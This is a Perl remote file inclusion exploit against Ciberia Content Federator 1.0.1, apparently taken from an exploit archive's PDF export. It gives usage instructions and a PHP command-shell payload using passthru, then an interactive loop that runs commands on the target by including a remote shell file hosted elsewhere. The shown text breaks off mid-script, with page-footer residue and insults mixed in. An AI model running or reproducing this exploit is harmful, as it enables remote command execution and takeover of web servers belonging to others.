1 #!/usr/bin/perl
2 ##
3 # Portal Name : ciberia 1.0<(Ciberia Content Federator)>(maquetacion_socio.php) Remote File Inclusion Exploit
4 # BUG: [Path]/socios/maquetacion_socio.php?path=Dr.Trojan.TxT
5 # Vulnerable Code: 1−include "$path/datos/datos_socios.php"; 2−include "$path/elementos/actos.php"; 3−include "$path/
datos/datos_ciberinvitados.php";
6 # Bug Found DeltahackingTEAM Discovery :Dr.Pantagon Expl0iteT:Dr.Trojan
7 ##
8 # Download =http://switch.dl.sourceforge.net/sourceforge/ciberia/ciberia−1.0.1.tar.gz
9 ##
10 # usage:perl deltaSecurity.pl <target> <cmd shell location> <cmd shell variable>
11 #
12 #
13 # perl deltaSecurity.pl http://[target]/[Path]/socios/ http://site.com/cmd.txt cmd
14 #
15 # cmd shell example: <?passthru($_GET[cmd]);?>
16 #
17 # cmd shell variable: ($_GET[cmd]);
18 ##
19 ##
20 #Greetz: Hiv++, D_7j ,Vpc,Lord,Str0ke,
21 #
22 # Contact:dr.trojan[A]deltasecurity.ir info[A]takserver.ir Davood_cracker[A]yahoo.com
23 ##
24 # WebSite:www.deltasecurity.ir
25 ##
26 #128 Bit Security Server:www.takserver.ir
27 ##
28 #SP FUCK.............: z_zer0c00l(floozie Mother Test 100%=z_zer0c00l=misbegotten:D)..........
29 ##
30
31 use LWP::UserAgent;
32 $Path = $ARGV[0];
33 $Pathtocmd = $ARGV[1];
34 $cmdv = $ARGV[2];
35 if($Path!~/http:\/\// || $Pathtocmd!~/http:\/\// || !$cmdv){usage()}
36 head();
37 while()
38 {
39 print "[shell] \__DOCTEXT__quot;;
40 while(<STDIN>)
41 {
42 $cmd=$_;
43 chomp($cmd);
44 $xpl = LWP::UserAgent−>new() or die;
45 $req = HTTP::Request−>new(GET =>$Path.’maquetacion_socio.php?path=’.$Pathtocmd.’?&’.$cmdv.’=’.$cmd) or die "\nCould Not connect\n
";
46 $res = $xpl−>request($req);
47 $return = $res−>content;
48 $return =~ tr/[\n]/[?..?.??]/;
49 if (!$cmd) {print "\nPlease Enter a Command\n\n"; $return ="";}
50 elsif ($return =~/failed to open stream: HTTP request failed!/ || $return =~/: Cannot execute a blank command in <b>/
Page 1/2
Ciberia Content Federator 1.0.1 path Remote File Include Exploit
DeltahackingTEAM
12/25/2006
)
51 {print "\nCould N